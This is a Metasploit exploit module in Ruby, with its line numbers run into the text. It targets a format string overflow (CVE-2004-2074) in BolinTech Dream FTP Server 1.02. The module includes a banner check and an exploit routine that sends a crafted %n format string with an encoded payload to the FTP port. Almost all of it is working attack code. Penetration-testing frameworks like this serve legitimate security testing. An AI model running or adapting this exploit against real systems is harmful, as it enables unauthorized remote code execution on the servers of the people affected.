Path: blob/master/modules/exploits/windows/ftp/dreamftp_format.rb
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(update_info(info,12'Name' => 'BolinTech Dream FTP Server 1.02 Format String',13'Description' => %q{14This module exploits a format string overflow in the BolinTech15Dream FTP Server version 1.02. Based on the exploit by SkyLined.16},17'Author' => [ 'aushack' ],18'Arch' => [ ARCH_X86 ],19'License' => MSF_LICENSE,20'References' =>21[22[ 'CVE', '2004-2074'],23[ 'OSVDB', '4986'],24[ 'BID', '9800'],25[ 'EDB', '823']26],27'Platform' => ['win'],28'Privileged' => false,29'Payload' =>30{31'Space' => 1000,32'BadChars' => "\x00\x0a\x0d",33'StackAdjustment' => -3500,34},35'Targets' =>36[37# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.38[39'Dream FTP Server v1.02 Universal',40{41'Offset' => 3957680, # 0x3c63ff-0x4f42}43],44],45'DisclosureDate' => '2004-03-03',46'DefaultTarget' => 0))4748register_options(49[50Opt::RPORT(21),51])52end5354def check55connect56banner = sock.get_once57disconnect58if (banner.to_s =~ /Dream FTP Server/)59return Exploit::CheckCode::Detected60end61return Exploit::CheckCode::Safe62end6364def exploit65connect66select(nil,nil,nil,0.25)67sploit = "\xeb\x29"68sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"69sploit << "@@@@@@@@" + payload.encoded70sock.put(sploit + "\r\n")71select(nil,nil,nil,0.25)72handler73disconnect74end75end767778